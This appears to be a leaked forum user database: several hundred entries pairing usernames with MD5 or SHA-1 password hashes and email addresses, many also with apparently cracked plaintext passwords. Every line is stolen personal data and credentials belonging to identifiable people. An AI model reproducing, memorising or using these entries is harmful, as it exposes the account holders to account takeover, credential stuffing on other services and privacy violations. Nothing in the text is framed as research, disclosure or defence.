+Sezer70:2c9676cb6aa76fc549ecbf8d161038f00c0aac09:karaman70:sezerkilic@gmx.de +reiter07:c06aa7395ad396c2ea1d0a72027c76bbaad0cf6f:dasija:reiter07@hotmail.de +schmittke:49ca53d1e2193b39814193a8655da32be7c024a2:q1w2e3r4:schmittke1@safe-mail.net +Aqqel:b1137666c540c5a158ea1b6d74514593::mathuvarman.rajendran@web.de +kolooo1234:809ed4c0c8e14be13ade11229358e55e::mcpeine2@web.de +master22:9da0bddf9c07461d8cf4d6b46c59c70d052aba75:328484:ben_laden2001@hotmail.com +Shitfor:63dc91bec3dff0ceb363ad77b6ae5788::yxcv@web.com +Invis!ble:4565a750f61c48bf8233daf087f1f943::p4e@gmx.de +black-jack:bb5949b3e153c4c7021475ad17c6c236bcdc38d2::SteffanKlauke@web.de +ibne:6487c4680f40a759bcfcaaa806376820::heihr@yahoo.de +spawn:a5cb6356307f719ed38573f714f03501390f6a52:asd123:spawn@jabber.in +bNcyde:f06cfc961b0a3c46d06489d8d730d772162d49f7:ggcut2k3:bncyde@live.de +Remix77:ec0c986df954a1821b4a27180d3c5f641f599e2b:hansol:viktorpfaffenrot@gmx.de +Yazzman:688e04ba8934b31a1f6f7fdd50953f70::ItsDaWestsidePlaya@hotmail.de +palle:080234dedbebdb6195782156acabb195::pale.yacouba@voila.fr +Inmate:554eed62c34ae5ca2c43221ba9ab4202e1d726e8::frodovsinmate@googlemail.com +SteamArtist:6ef17cbbce28c9b417aada6eefcb9c93::hazz@gmx.de +my_dear_hell:b07cc4b12699c663acf1ea906937f5cca24807d3::my_dear_hell@hotmail.com +xantrax:be0566a906339950a5f69389295e4b8f::jay_dakay@gmx.de +ev0:4174ab8998160141c1c29b1671f1aa29e350f789::ev0@gmx.at +Hakalulu:9c13a0b2397954b3861eee2cfc601177::hakalutschi@gmx.de +TrashMail:6e0689afa7767d0f7aa3e11bafc92362abdd3583:lol123:nbasdtewq@ymail.com +Khijano:278aa75098d8f2b2d8c6acaf8cec62fb45e93b6b::rex0@hotmail.de +loyalerkamerad:b777699549c47c9f4dc8bb6a04d693d6d99858e3::bumser2211@yahoo.de +x-tream:3fc9effd823809b95063c56f91062839::noname1@hush.com +FreaZz:53e7283873775dc4bccea8ae53eccc71::a3872001@owlpic.com +shrek-id:a8bd8c367ed9916a3dff15dcf4031dd030a21dd7::urlaub.schiff@googlemail.com +Crashkid:efc691b538d8437a06d4a9dac2dd4b68::Frank_Oswald1975@xemail.de +mrx:855e23f3acb173e573e11b6ae0ba2170::dickeeier1@hotmail.de +kingtph1:1d74c64604db159284a8b8cc67ec1336::gittar88@mail.3dl.am +tom2199:a39e1f580811711ade771c40c4927c6e::tom2199@q-mail.me +BERLINA030:f896c8ee8b7122b6fd760039d68a9bc1::ottmonsta@googlemail.com +Gh0stRydaH:27167687238a5f8cc5ad23213887df2850d8a0f8:Wixxer12:ghost.ryder@live.de +c0ntact:289cfaf31147f8288989b7f19822bbdc::hannes.bman@yahoo.com +Safespeed:5207b5be4ad80666fea21463ae4675d7e92e2ea3:ilmuea:runover1@web.de +Spliffy16:b23cae4123569b4583f6096c3b7e3e974e507963::audiopeter@web.de +Bagacha:89db34fc39d1f6271801b1576419e7a40451c7df::A.i.d.S.kind@hotmail.de +Ciuba:2748c0c4c0c33a0284ed0cd4969e4579cd620920::derajiziro@spambog.de +packstation24:eab7cc82bb42e38aa35adfd29e468d5b6e30a7b7:: +Haze121674:2fc744d03502c999852fa77762b7c3f5eb623fc3:29031987:haze121674@aol.com +pwnd:e28147af580ce5f7541474ca4981038d0670326a:456456:pppwnd@googlemail.com +theodeus:958fe29b5070e4dc93a533c066059e2a9f2d90de::akiller1337@gmx.de +SuperHorst:e139c43b0c9c1276cda02299b2359bc90625ed52::bobby.bang-bang@gmx.de +Device:b9538679b928a7e5fe47ed67d9b48d458877f2cc:kickit:williostermann@yahoo.de +Kern:834c2d53a17445238fa520acc7ddc6d5::habbookan@yahoo.de +Dave10:c549cf03fb6effbe7eb144c1c561ad559d408643::k.rapper27@web.de +DrDr:3e35d2f8fe77663bd5f14f598fc6ee63::dennis.mbach87@gmx.de +meradil18:489015ad5cb5f7eb096d6d795305806d4c0e30c4:playboy51:niveas19@hotmail.de +V.Valentino:b8299a1d376004c7196aefa3c6bef79cfb7a6ea9::V.Valentino@gmx.de +Skyleo:b6b20726e9480892161d97257a04f036::w0rld@gmx.de +emine:625c6fd5ff6d456fdd13d981780a129a::iojewiorew@yahoo.de +anyway:465d356bca47ed1bbf1bbd87e4e0852a9315c685::NotoriousAnyway@Yahoo.de +p0f:5d22da61f275c40be12699a0b02ea019::point.of.failure@gmail.com +denush:83a94461ff7906aae16260f10c5d3b1e320f8a75:tiger1988:denush@web.de +Mira:32d54d92262c3f0a7fd667bac1c68d60::jinsai@hotmail.com +groby:651e11d5bd2bb6d0eaff5af2494f383e34b4f71d:madrat:dunkin.donuts@gmx.net +sibirius:d5db40a19dbe6079b93b583e18a58b29::sibirius@hush.com +jabbab:729376b456987a8417049d89b19cdc42::tunks@lavabit.com +luke_duke:6482f2598000bb3f76393c963eaae1f9::lukasmiglbauer@gmx.net +porny:d9bf9d5f2320449909615fad923dd0a5::lilpole1331@msn.com +ESP:1b7903196d835d0a3b75999cb6d28df3::esp@hush.ai +Tatinka:f2bc652cd49eaff351249942cb508fabedbbb861::tatinka@secure-mail.biz +rubbx:f64386147ce8e25b9ae5149814dddcbd::support@vsocks.org +Bizz:c97ed57182dd39fbf7e67e445d7c14b1::t1pizda247@yahoo.com +Morphim:0a8766fd72abdfcc3e9a8168fd3bb3f5553918da:12104:omeqa@myemail.eu.com +Dissy:313600e342eb593c84a433c25c8e2879384a3703:shakur:Dissy-06@freenet.de +goLd-Serv.-hq:f5b75d699636f91483912d8d4edcaf6b::f175777@uggsrock.com +xXLegendaXx:75e1cd71957f7e721c862b5f5f7748bfb34d87a1:123234:realboy92@hotmail.com +uRmel23:2a83f78e4609e53523d93e7ead88cbc369f71d22::urmel@inbox.lv +ingo5:94c51c09fc17b5ca2fb1db71740c1be752d6fa93:qw123qw:hansihans@safe-mail.net +ms89:1bade4c55e598f061f0d0db773c35f3417af2c0e:kira2002:ms89@gmx.net +xxxxx:002d6bfac5bc6446597fb1f47d6b597f83f44b58:altair12:phil96@gmx.de +killa:e95c5560dff593d184611e2d224daa041e0421c5:sikerimseni:webmaster42@hotmail.com.tr +rippy:105ffb0b146469d61663254f7739b915::yarak@spam.la +mizor:475c9539a6ac7ba2854145813df3fb62::a2641181@owlpic.com +shop_vendoor:816b0a8c76bc209e9006b0448702e773::shop_vendoor@mailinator.com +alibaby:b79d09b15f17029b05acc5e342a67293256512d4::alexstade@hotmail.de +al1b0mb4l1:75f093c6e74f83bde7832568cd5ae319::cocaine.roqq@googlemail.com +ATLAS:62a34a695f0e0674a6ca4b529906066ef52e65fb::IP-Sh0k@gmx.de +Vader:ef165c67eff7f634ec7d3c2976974bb9::vader@spam.la +aQuaaa:1c75992e86892cecc128d890411ee363368a4b17::aquamedi@mail.ru +xdondosk4ff:bafb8a59452df8212d539d9bb1e7a5cf444cbeee:hans123:accounts13@web.de +Sh4k4l88:e3716ba678eb56cce6c157368f652567::ulrich-zapf@arcor.de +TB4ever:c395fa9618dbc5e6612262a3f40a8af6::tb4ever@secure-crew.info +wazzzap:3293bca81860f1a3037562562684d582ef99496f:lol300:wazzzap@secure-mail.biz +Sophokles:5685b997542303538a34016f5b5987c4bf3d39bc::Er3b0s@mail.3dl.am +Freak_:38c4c04b2299aeb3008b4e1932622cdb80704cf1:kevin1992:illexmaster@aol.com +audi:eb68d469e4d4cd167849f2d114e26b23045c4f6a::remy220691@gmx.net +M0rph3uS:b1bdfa2a1a32385d1c44b45f64c488f1::admin@darknetw0rk.net +Managarm:4b370e79ba558912e6b517d2b6d60d953166908d:babsi243:managarm@hush.com +xXBlacknightXx:17bf76c940bd80ec751719f6f064d908::funnybadgirl@hotmail.de +Wustu:59d7255426a935cfbd4b3090494a4ae5::wusaaaa@Safe-mail.net +cardzzz:1dbd2e6ad921d00161d739aa3b96db62::soupivou@mbx.cc +max:967f66e99734f23579dabd791de3ed9e39b0487b::maxmucke@secure-mail.biz +osman:e378e1dbd4af72c5162e8d5f9b0edf65::osman1337@freenet.de +Keks123:ade08f28a31290552ebd9efe8b73fd3bd11b7f8b:19911907:rw-essen07@gmx.net +Orthos_:5bb999ca36e4f220ef344545ef43bce60cf6756d:123456789:f265740@uggsrock.com +chester:01904cdd2fa578202f39d9cd87726f528866695e:blub1234:patrick.apps@googlemail.com +Freakzzor:a5534d999c943337a00566653bb14325be39d33b::freakzzor1@hushmail.com +BliZzAr|D:22c50bb6197685b9c1af868ab686cda993a9da16::the_gamer51@hotmail.de +Cellix:5e8f79e2980d2a4378c811b1a98aa586b899bb90::cellix@nm.ru +Klintel:ca08a254273b820ee68844945c9101274ed154a0:bastard123:haas2020@web.de +syroxx77:b73501e59af48b504adc9d08b5e67ed6::syroxx77@gmx.de +Dennixsx:d95a885fd6fb1f2d941df4d6925df8abd6dc2baa:lala123!:d.puck@gmx.net +legit_2:42b4dfaf732999187249f877904f9632ecee7022::legit90@gmx.de +SchaKaL:346748847c434b8a2f3b15f48ef9f696::phillip.fuhrmann1337@web.de +zaubermichel:1f2c557239e35cc7680e4a880ac51506cc7441a0::zaubermichel@gmx.de +replayy:6a694506c37b4c4d0170837e583c9efe::replayy1337@web.de +Shokk:6c6fc3d6acd841a96f281641a49b6127::send2toni@googlemail.com +Fake:ad9610801c50e46cd5735458a619cf465f62b2f1:789456:s.grunewald78@yahoo.de +arch0s:15db383875c8e16d057ceb6ff42d42e8::arch0s@safe-mail.net +Hypnotoad:5b617aa01a8f87b2611556f7156359e76106d251::frederik.obitz@gmail.com +Sperle:1d8480b78d5755623ad52a9c1b65b8c9eb88ff13:29732973:sperleperle@web.de +1337xD:8dcae605575e8465e1a3022b7e60eb96::TheVenoM1@gmx.net +TheCongo:800cda4b0bbb17765f88b7896492a51c3320118e::congo@trash-mail.com +bubbleman:24b7c94e15babe744871f4cf69fe30d9::radiowoho@yahoo.de +newcomer:d326e90a20d6a041649bde0b0379c09dde057b8e::nici.90103@googlemail.com +xD:5e001f5173762c42ce91e10df9e5221cfa15264b::ikasng@live.de +RichiThebitchi:589339363ea269a37c294c5a57927512ed6e7f19::edgarundevi77@web.de +Subutex:3f3973c8a3a2cd76f1279e0efc44fdd86bc409ad:123456789:fettervater@web.de +E-li:de16cf8f32581b2c54021da631a1e182::sam20@gmx.at +KuroiRyu:273a8bfad8b5f2b75c3155424fcb30290cb353e0:wowanda:milch70@yahoo.de +TopSell:5af1b8a21eb3d6dd9aaf7a3c2313d930::topsell@hush.com +PROTEUS:1de94eefcfb194d1ee5bfccc8ee08b3d:: +SynT@x:95f1257d88e66f09945a0cd2a5097b71::a2707989@owlpic.com +kaka:91f5b4f250aec841d8ac31ff8b310ad5::rowley.joseph@gmail.com +Darksro8:f6ce44e4ff24b0a0f3ab1af640a7aec7a6c50c44:werder4ever:dominiko01@hotmail.de +jebiga30:7fee5a591b5752d55b436583381d87f2e5610062:dardan11:dardan_30@hotmail.de +Lawbreaker:736cc5dc67e861f9124d35be033660f03f982c5b:lol123456:sulake-habbo@live.de +Boterkid:baf72fdb9befe4459287ef7edc831148::boterkidd@web.de +*Poison$Ivy*:4bc22fe37b4a0624db84e74ed985bb5d::poisonivy.info66@googlemail.com +FreeZa:f0d27ee4c22bb8152f57d70a6ce8c5f1::f334123@uggsrock.com +4tr0x:3d02518efdf95adefcaf5eab6cb67844::4tr0x@hush.ai +miguel:ffabc6d2cc868e2507277c1584550f06c4b5d67f:scotty:rainerschuck@hushmail.com +bluphil:d1b53aae28feafa74e314545076444b9::bluphil@safe-mail.net +lolipop:c83fb1eb969d31d2dbc266b6b47e716d::killu12345@mail.3dl.am +Muti:edea671ff369136dc7c8c4d21ed17adda31c5a44::Hemoschurke@mail.3dl.am +Dr. Sp!c:4ccb045028a1e6f269e6b93c18b6afc704c8f096::drspic@operamail.com +ramses110:5014fc4529997fedcdb26f0714884a5391748e30:816868:ramses110@gmail.com +c3ns0r3d:b95dff9666f4e4a40ff9b5b93b15ce39::spatzelboy@qip.ru +whit3:a43ca22000efecb37b570954073d341dcb0cbfae::whit3he4d@yahoo.de +pikant:ff90526981c3d46470fea4958b7ec91c::pi-kant@yandex.ru +checkit:8bac8d9ff8bb50c92b5e54a3534cc398aad63cd8:123456:checkit@mailtrash.net +n0n PlUs uLtRa:f363e37814ad1f4a4a1fd7f40049b51e::thomas.bauer89@web.de +zensurla:882f9189295f3d62ee76bcd5e31def94::buddydigga1337@gmx.de +bose:65e74f56ad3b8c73373c0834cdb50e40::bose1337@gmx.de +h4nnu:bd90fd6ff7f4d1263a6b2236e3225470::lazzar88@yahoo.de +Heimz0r:538400600d1aa2da28e7e455b5686d98::d@furdek.de +badenator:0db6cd1713413e8032abeb7d64bde6dc3a0fa34e:shayan11:anush1@web.de +ThePunisher:62c03daae4278a1d79fae1ec230c944b::major.gunner@gmx.de +txto:1630cba6666ce599fd64a3263fe23650091f067f:123456:u.m.i@web.de +philipde:7e7ff70fd8eb322afacb9364c721c321116463b4::philipdex@yahoo.com +jens3910:b8301248b8ac7484d1fd20d3e2924694f29eb7ce:aaa111:s4leagueistcool@gmx.de +nexenn:83d3381c1c8565ff198d27c415f007a7::busing_kai@yahoo.de +LilWayne:419944b2208df025580f3c85a2fa9055::steamcheapacc@yahoo.de +shorty:460e9b7170d5ad014833dce127687879d2806226:lalala:shorty@mail.3dl.am +JohnWayne:1db2739209f57519b3636f6d1bad4a863adda7b4::wayne@ivacymail.com +HanzBlix:e65882c8d3e2bfdf23e7ea37d5e1cfccd07f9f83::HanzBlix@inbox.lv +RuelzZ:d50670149c42abc1406fac4588506e848f21c26e:123456789:RulezZ_css@web.de +El_Manjo:e5ec3e756c5b4088f1e866ca20dbc9e41df0dd43::wickedsick91@web.de +chris36:4f95574810d38b4cc83827663a5227a61a4720c8:chris1337:f384305@uggsrock.com +profiler187:468d4029dd4fe951ea2b0e664100c1f4::crazyruff2@yahoo.de +Perfection_:fb0c87ca3ed7aab55f4f8d19aad623896d70eeb5:nese61:o61@gmx.de +Kise:d0a75ec40328d0cef04464cb2100f9d423bd591c::wurstklaus11@web.de +Identity:31584acf78653768ccfb126f4a644526b0cfb512::daluxa2@yahoo.de +gumballs312:f93eb645c6ec8a85b2ca507b2bf83670::a2448059@owlpic.com +dustydeluxe:4556bfe3647be1809f7f52fbdeca2ca3::jaminess@web.de +madtrax:fd362c4482b208a83337a63d2b06f08e5edc43a8:Gateway1:madtrax@mail.ru +ultimator11:384c28a61e7472ea5ddc86009ec005bd::ultimator11@gmx.de +Au7oX3k:0bca92ce606c22f79cd8c1bffcc5b7e9c7a78fda:pedant1:OoThyponoO@googlemail.com +zet:aee02958ba4c393435fa67a5933d0d9309aabc10:Remix123:20rofl09@mail.ru +unbelievable:63515ca898388df1b59da2dd4e71b286647fc970::tobiiiheinzzze@googlemail.com +enjoi:ccf4fb78306fd71d2814f3896063a66e::Bruce.Himmel39724@web.de +black--cell:10db5688f31fa3d2478cefcc085186d82efe801f::2night@inode.at +patter:61d4ceeab736d7ff861d8fa44e812beab69af91d:weiswein:patterwein@web.de +Biggie91Big:011bbd0afacee90fc99aff95e0eea54e::BjWi1951@web.de +dumper:2917eae0a8739862f24534c32471c81c53b7c1f1::dumpewumber2009@googlemail.com +Sc0p3:61157caac0ed06c16177492812c38921::xsc0p3@ymail.com +sheva7:a43776562f9777313ebb88d9ee4bd9db::sheva777@web.de +Xaras:2e0e5d24aaf8927c5a3a319281e54f1474b91afe::sdklfjdkljdsfsdf@web.de +godfella:4c5c68c0549930510a639cb1c2dc0aaf23ae457d::godfella01@web.de +francewar:2203831c5b73579b6908d5e2763e5364a852b537::francewar@web.de +fork:bf1713d436becd54224b159de709bd8a6953056e::blasmich8@web.de +Spooky:ec28f518f9cf0e1e668dd52a4749d7d109dca87e:podolski:marvind1995@aol.com +Tun1:518df269cafd3b83fa291924806a520c21d3bc5a:140385:keyloger@web.de +mojo:6721674e680bdd13e243ac6b275d0b64::f453204@uggsrock.com +bertrank:173c98ef3047c72c4327426928b6f9b9::dassdaassdwws@mail.com +strallemann:ddc7260bc932780fe23fa2290fd6482dfc74de9c:wolf84:mudeer88@web.de +shygo:fd8b32a62578d17c610d1707bfaa7306366259af::shygo@web.de +discopogp:72bba6fa165c99e40afd503467020c3b::discopogo1337@freenet.de +beste:09f55771358ffebac828b99a4cd0bd3a::beste12@gmx.de +PWND # MESUT:7e1869df98aa93e3e5b5c473063499ca::PWNEDMESUT@w.cn +p00ti:d14494b97b74e54ebf5e4bba812b8840595b086d::p00t_ru@mail.ru +dealer10:b858b577ed81c136b0e9dad0a062f60c::S.Style84@gmx.de +delta9:b32d5880597ff44194dd4114f739ad42::delta9@hush.com +BayernFigher:6fbbcae9402f2aeba22e1e72dd094a8b::kljlkm.jkljklj@gmx.de +CARGLASS:e0cbee0af4974459d80bf687035d9d0d::carglasstauschtaus@web.de +TheCoder:9b68c737141f57ebd41c8323fd4a7ede18f91978::joshfosch@rocketmail.com +Montaxx:8b677e71d32e2a7eccb84b7d97601af0::a2719512@owlpic.com +Dazzzzzor:badab2e7200087ee53a3b6629e293e0b::aliunal86@yahoo.de +Chech:83fb24d47dd958b743691524a4b2a774::monotnot@googlemail.com +DerKingisBack:6a9407d541da67c6361337967ac5dfc15f2fabbd::dkisb@safe-mail.net +mn2609:882241777c6bd2517bc8cba177426301::mn2609@ghbsys.net +shmi:7fed6d96fd61534b197b5bed1628e2c7cfac3d1d:654321:shmi@yopmail.com +Busted:4dfa6ca552b21bf7fe14565cb89f52d2b112353d:adiadi:fasdfadsfadsfasfadsf@web.de +eXpL0iT:5d2fed99f647545a5458a355a3cbdb2c::freakii-babyy@web.de +fabio20:29297da725d191707f26a07fb26b94b6ce2b77dc:555555:wowfabio20@yahoo.de +lgdotnet:91121a09908817df6913e29ef7fe16e5c640a13e:464602:ejanic@googlemail.com +yayo-MASTER:fabaddcdd026ff5d6a6299fda07c5c60b692c1c6::player532@freenet.de +Tzunami:3888363f82e767488eac77c5a503d16d::a78278@owlpic.com +Mangotrance:5f4a0addaf2f969a28e54324f09c0b5fa32287ec:frucht:chiennin@googlemail.com +franco666:ccd2d7347ee75d6186138fb17823f4a9::franco666@hush.com +D1ZE:a902e6ce224d790061cd6c377db658b61178cd18:nxck698e:kirill.T1MCH3NK0@googlemail.com +Hank:1b8ae99ee25641afec4390f544c401355af1ce35:austria18:trke66@yahoo.de +Showtime:49eb0eb57f8652bf464af43de6f06c29::gulopa@hushmail.com +tram111:4ab71cb6b208e17f597a3d5cebb8f2c7991b1aba::tramonto@tramonto-music.de +noirblanc:52e3e1c9a678c38ed50f9f323780f0beb2244aea::aa@no-limit.in +Nyuu:532730c94c4304f9f65d3c6bef43a1813385e342::yumishiddo@web.de +fener:4b9ba32f9459bdd35877910219d6064084869249:a1b2c3d4:fener@buuh.org +Bongo:9c9ec0fdfb05ddfde9ff5a4616430aec2404f7bf:X-treme:21937zdigf79t9@web.de +Jumper69:8c44dd788565e85c59b03952eb4a10ed::bass_music@hushmail.com +Speedwrack:4e6089144a8bd4e49b459f8f31974beb::dashieristder1@web.de +Nexxis:465c77fd151ed3763fe03258dba653d75ae3791e:123456:dashieristder2@web.de +ms13:04f17ed65620110cba1a2d71bfe1e6a6::mara.salvatrucha1@web.de +el Padrino:efe0c7c1c5d56050ff284ae80ee03223d10acd97::hansglueck84@gmx.net +Kalle65:6a3312be8423a8777180b3f1efb45481f62f01ed::Memorex65@gmail.com +alcapone:90f8050f406bd6b346ea1ccabd9b6cb7::lenorsaaa@yahoo.de +taktlos:4cc7802e2790504bcc4b5f9479e5767b::kumbli@web.de +Chev:f530018950aa218f4cc333dd1e3f88ce18428fec:xjyqq1:cruel-bastard@gmx.de +domain-dealer:00f15215288672f8ddb687c46ea70833::bloom1973@live.com +Rafael1989:ad92f7dba6f6e6d088dfbbd67cf9571f470a14f3::fgschmitz@gmx.de +casinoyarak:d7f6a6c7962f035196daed29b6b59f53::casinoboy12@freenet.de +CocaCola:2b95420388143107e21d245c185c75696a34b7e3::icon111@web.de +glock23:4caf3b5c4e5d5a8b921defd5d15b0d0ec2fe8b75::SteffWinter@web.de +Drago:880ec0e72aa3c7738ab7ec2f05d17e28::ferhat.akbulut1@web.de +p01s0n:46217862200d1fe29fceb0730d69741a1b770c99::robinheller1@gmail.com +Marc10:0293dcd5a31eb92f68be3aae05e677e3::dicdoo6@gmx.at +destructor:7549c1882899da32c0a58b280002c3f0a485e60d:nx6200ax:owners@user.3dl.am +unl3shed:c68669a13b4792855903bd305ca26126a4226d30::timlane96@gmail.com +Weeman:602e95da049f5bb3c271a9d3414965c4::neumannfred@arcor.de +xRaidon:5e7fed3b20e09a42a826a036e97435337dbd7a63::Kostenlosdr@web.de +khaz:cd7cb6dcb310903a191ae454caf26193::kHAZP@web.de +RSI:9a693308a9104a43a306348cd56db4bc::union@ist-einmalig.de +lappi:5ee13d8e5a4c40954bec4c4931cb9665::dr.barbara.sander@web.de +fl1:2215d2a10e7fe75b80f2796e238bc57be4414616:tonline:fcbesl@googlemail.com +Iceto:c7644fe7c3840fea2ca31d7e6ffca560::ukmcuk@googlemail.com +Yoshimitsu:e954174fa9cbf661f520878d076650a6::kevinkirchner100@yahoo.de +MoNey $:333de1396fe80507e4ee12558c5d09171700d6fc:airforce1:martina.smith61@yahoo.com +NYD:ef7582ba7deb887ad1d1b4967a33747ac0aabaac::hallo789@gmx.net +Panos:a6fafb05d77177b6a90e2c30e6826a10::36zwuc1ynr@web.de +omiture:2ee1ca276f94d31d78d29e8a3eb6a72cbf2f7d6b:12345688:a412497@owlpic.com +bugsy:581020a564a27423eae56d2df4b14cfe::dieter-heinze@hushmail.com +doubleman:34d10b028bae34058a15596973122081::fra.colek@gmail.com +.kaze:8cb3880f8ca20c2eb007acb912129331::stein-fein@web.de +DON_PEDRO:ee48a0bc79e33f8f7776f4f1a72e921f3b662758:affe12345:Davut1234@web.de +1337_reactioN:94d36dbec68fc4c9f87f4cb476136ec7a2d27261:dominic123:k9e20pwo17@web.de +TBL:f1b6d7dd8c6d31328d7454f3339694b5aabc6826::henrics@hushmail.com +bulletxxx:9b998b9c52117333b942fb80477fff895d591684::bulletxxx@icqmail.com +BadMark:711781afe29898d9c91f34f1b0cbbc48::xxkktestxx@yahoo.de +socke:58c43643beb97bf59fb5f897a9c9f8aa::Lucas.m94@gmx.net +erebos:98a88ecaeb0a0fe2a287e38a014ee5cfbd0721d2::pelzi.lol@gmx.de +jolly-roger:feb194273eac064554d6a71e2374e0b8716299e7::mr.nephilim@safe-mail.net +wanted1993:c9b1ed199c813ff8ff778e5367da0801::kevinmueller8787@web.de +k00ky:e78f44a66738a3df63be7a2d3bb3d8c7b19e7086:f0r3v3r:franz.huber2@gmx.de +Randomnick:f1087282f7be297e6467a8fbc12839f06bdb48d5:ac14ab:Templer198@googlemail.com +tri3cer:06c7075d8dee845fca6cd2373c6769950763cea9::susa.effa@yahoo.de +Jonso:df84c8b17a703a45353808b49c338bdc166f0615::jonso@web.de +JackDaniels:837d4931e85fddd63fe6c633b19dd15f6cf5bac1::flip12311@web.de +jiggaman:7d7dda45c5bd1c425cc98883b029c175::jeanlouisduchamps@yahoo.fr +wuschi:b0b89f3cf03ab2ef68250537f1d597b6ac789908::owauschkuhn@web.de +peterpan:17ead6e9db20aa5c47a3b00586b4f9f7::n_pett@arcor.de +CyOn!X:4bc10946ec7ed41e36e5e8c2ebce048ca0985e55:hacker91:kersti.wieni@googlemail.com +Usakli:b5538645bed5bb618fa5ca9ef36c1988fe17845b:hallo123:gentleman2584@web.de +niemals2112:ef836a1b72b1ee64207be5f714bb7382::aumnds@gmx.de +S3c-com:e700205f8509beafb5136f050ea15685::53MSteiger@web.de +leete:981cdbe4a1cb8e7652bb211a521501b9::leete@trash2009.com +EsseX:77895b0189c9062ae882c4a7da2e3c691c5bfce8:durnodak:t.bork1@web.de +0x3a:fae988febce076129b4a64c7d7ca0d8b::0x3a@mail.3dl.am +blocker:1383c6e921839cf12d5ce067e811500156cc8bdb:nenedu:blocker1234@yandex.ru +Cifer22:4afe2bc069730d8b81efb79242ccb5690abc3906:area%!:cifer17@web.de +byt0x:b0a0befc9cca5c7b6b0878d42687b9c6::m.texo@gmx.de +derhonk:e403b2f921f3595360480df673d9355a61e55b0e:peace123:110schweden@googlemail.com +Wallenstein:799a03b16b1a4880b66ac8da27b64b71::mightypsp@gmx.de +Purehate:717ee91a16521b6765b243358286d1f7::bademeister33@freenet.de +NoMercy:aae4102727b79942d5d23dd473cf65fddd7a2413::3skillsofkind@gmx.de +kamelreiter:8766b0307a49c4a7b8c022d3c2c37312ab2319be::mr-julian@gmx.net +zeratox:910dcf5aff870acdb90eff63475204f22a80d9b3::zeratox@secure-mail.biz +serialtest:104d53bdc6e1f12ea970ab4b0f874e56::y4y4binks@gmail.com +panzergerman:8c166b9dd0ad3cc7fe804841af386a7b::kljkljkljlkjjjjjjjjj@gmx.de +panza:d73cf797a8066a17161fb219ea8556af1b37e133:95403787:46ziger@web.de +gfx.net:cc4dce5fb489ce3eaa21b6612d4098f4::schumi-steam@web.de +Necrox:c26599f7bb1ae7bec5e5247d51e60046::andreas-whemeier@web.de +moe:52c1a330936759c7c3ded79bf809cee42f48b3fe:ficken:startyspp@web.de +x33q:642ead930c6b91930cc2e7ebab7732479d5b79ea:fickdich:x33q@mail.ru +sandypowell:24643607eee109d4a7dacc4bf0287c4b::sandypowell@gmx.ch +White:0e94b24d31a2bc9feb0d242ee3beb5d6c85d3cf4:123lol:xwessox2@gmx.de +deviboy:53b1a49e9042911aa9199515db5c4b41532fe091:12345678:darkdeviance@web.de +money:3fdca938bb13fb8b89562c47cb07a845::stylabunny88@googlemail.com +MATZE!!11:52401c5c76a8a0a7c4efa722b0c277b9::ruthmann-guenter-web@web.de +Chilled_Hard:c48e80e7ec2ce111411967f1bd53dfb8::chilled_hard@gmx.de +michaelarweile:1fa859927be0e3af509a5c528f2f46c0bc0f04e1::michaelarweiler@aol.de +bangyourdad:0cab57cf65d3e634bcc648d15160110d::bangyourdad@oleco.net +iPoker:fe8b0c25c0248930cba2a7cf5786168cd1741ec3:hausdrop:ipoker91@web.de +h00:aa03d8d4dc951bc6539fe932d2ed7399::h00@hush.com +hephaistos:8462dc1042370bd4ebc619b37d3b69d7::vhephaistos@web.de +conix:c866db91544077080dcd7f80ff2e257a::shadow409@web.de +Moe.:cf54907765470cd4680589f9661b298c7a716a1b::gycbo@yahoo.de +reddragon137:121ef88776802eeaefbfdcb3f9c2f56022851613:vegeta1:dennisleist@yahoo.de +onemanshow:32827884dddd6778136c109f500de27acc60e5fb:ekouv1334:pre9r@web.de +VITALI-:58439b18a6dace57d110effb4f0e6fb06cbace3d:v123456:kling.kulmbach@freenet.de +DarkMedic:32d8dea5ebf80f9d74aba96c64fb9671::metin2hacker130@googlemail.com +blackamp;white:8af237a6ef15dddd4d43ba1712fa606a::a356737@owlpic.com +CrazyFranky:7bb2beaad5c733bb7f488c6bafe5bad44123067f::chris-steiner@web.de +magicman:e5dd9bb3b74baac9cbde97ff5cbedb8665febb22::alexandergabor@gmx.de +wiesel:a62351242dd1d988d87e3f0a867cc781::layer4you@googlemail.com +Dr.Zero:9e1a6f1f6e1e5264f8f1aebf0cf6e8f6f46ca2cd:lusenheide:dr.zero@hushmail.com +hans:dc6b2ac765abee73e4610c138b600449cd532429:123456789:lloll7@web.de +KING:b02e0d903d0ea1bb79b1b4f4c27526b0::oliverfritzsche83@web.de +king_masi:7f72549b6e6a05311023de0ea9cf8da332b6b786:landshut:bananabosch@freenet.de +H3avyRa!n:8c147f819596dce7b76736204a1a58d6::halster1@web.de +DrDarky:1767c968089a0c5da53298958e5b85b3cc65ed0f::drdark@ymail.com +Da Vinci:36896a67f504328855ba778271f05a50fdfee58f:napoleon:davinci@twinmail.de +UpLinker:c127ee87afd014918768669045fcae37::musigt@o2.pl +NixoniX:43cbdca49cfae7f38b8590d5eeb870de::Nixon78@web.de +Mr. Ca$h:c5880fd8b82d63de8c010e98aab0bf78899afbe5:XDAIM0NX:Owned_x3@web.de +turk58:fb8b04859263f0660986a9ba2a9aac854930c5c9:celile:sezer_ece@yahoo.de +brutusania86:6265a04c1b77e79c5e89cdc6b9ae5c1723c643db:wz241186:wilka16@googlemail.com +EFFiZiENS:63758b5bd3aa3e3aa1fd33fb7b3e9ce41125b19a::effiziens@gmail.com +WebStar:75f5f52496dfc6387118a3529f17dd39a5c556d2:25101982:Moszczynski@gmx.de +Nut$InMyH4nd:3d7ed1fcb73466df855851378626514b::BlackJack_888@web.de +ccg:1609ede2151188e7331ce666549b46ff19c1e55a:29592959:ccg@web.de +LongSleeper:f710951f05251b82a4054d4e2f0a253aa226e38b::marco.anhaeuser@gmx.de +crashX:f717ce5490688be3a4f5c5aa70f00ded66549754:462855:sierocool2003@aol.com +fogel:e3bc55d545d4bb0c87c54014065d454164fd338d::fogel.rules@gmail.com +soul.linker:f463d9c6f7aba231ff724820341f432d::soul.linker@gmx.de +security2010:d558000cced41b70cf6111b28facc76c::undetected2010@googlemail.com +faridbang:4c570879641d62756c334807b969dda0088b87a8::clubbanger35@gmx.de +ankashi4:62b81427fa0da33a799683b1eed6b5dc731a683d:handball:max.sikorski@yahoo.de +CoCo:1fa1be42d76c0173365061e4ec31fbc3c2282f86::toxicwirus@gmail.com +Torres:36b45d47e7c7d37216e83084b076290eafb66adb:thunder01:god236@gmail.com 